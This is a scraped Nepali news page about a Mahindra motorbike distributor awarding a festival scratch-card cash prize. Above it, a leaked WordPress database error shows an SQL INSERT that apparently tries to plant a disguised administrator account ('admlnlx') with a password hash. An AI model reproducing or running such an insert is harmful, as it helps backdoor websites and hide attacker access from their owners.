WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BiqrUWxo8zjvCm5PqQ0LE.hduxVyE..', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-08 07:35:38', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ १९–
महिन्द्रा टु–व्हीलर्स् लिमिटेडको आधिकारिक वितरकको रुपमा महिन्द्रा बाइक तथा स्कुटरहरुको विक्री वितरण गर्दै आइरहेको अग्निमोटो इन्क प्रा. लि.ले दशैं तिहार क्याम्पेनका बिजेतालाई पुरस्कार प्रदान गरेको छ ।
गत अश्विन महिनाको दशैं क्याम्पेन अन्तर्गत ल्याएको “महिन्द्रामा यसपाली, लखपति बनौं दुई ताली” नामक स्किमको महाविजेता घोषणा गर्दै ५ लाख नगद उपहार समेत प्रदान गरेको छ । विर्तामोड–७, झापा स्थित साई अटोमोबिल प्लाजा प्रा.लि.अन्तर्गत ताप्लेजुङ्गका हरि खतिवडाले उक्त नगद उपहार पाउन सफल भएका हुन् । स्किम अनुसार स्क्रयाच् कार्ड मार्पmत उनले सोधन राशि जितेका हुन् ।
यसरी समय समयमा विभिन्न चाडपर्व तथा अन्य कार्यक्रमहरुको अवसरमा कम्पनीले आफ्ना ग्राहकहरुलाई स्किम तथा अफरहरु मार्फत अतिरिक्त सेवा प्रदान गराउँदै आएको छ ।